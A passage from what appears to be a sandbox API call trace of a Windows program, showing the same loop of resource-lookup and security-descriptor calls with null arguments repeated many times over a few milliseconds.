pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.104] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.104] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.104] LockResource (hResData=0x0) returned 0x0 [0070.105] FreeResource (hResData=0x0) returned 0 [0070.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.105] LockResource (hResData=0x0) returned 0x0 [0070.105] FreeResource (hResData=0x0) returned 0 [0070.105] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.105] LockResource (hResData=0x0) returned 0x0 [0070.105] FreeResource (hResData=0x0) returned 0 [0070.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.105] LockResource (hResData=0x0) returned 0x0 [0070.105] FreeResource (hResData=0x0) returned 0 [0070.105] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.105] LockResource (hResData=0x0) returned 0x0 [0070.105] FreeResource (hResData=0x0) returned 0 [0070.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.105] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.106] LockResource (hResData=0x0) returned 0x0 [0070.106] FreeResource (hResData=0x0) returned 0 [0070.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.107] LockResource (hResData=0x0) returned 0x0 [0070.107] FreeResource (hResData=0x0) returned 0 [0070.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.108] LockResource (hResData=0x0) returned 0x0 [0070.108] FreeResource (hResData=0x0) returned 0 [0070.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.109] LockResource (hResData=0x0) returned 0x0 [0070.109] FreeResource (hResData=0x0) returned 0 [0070.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.110] LockResource (hResData=0x0) returned 0x0 [0070.110] FreeResource (hResData=0x0) returned 0 [0070.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, 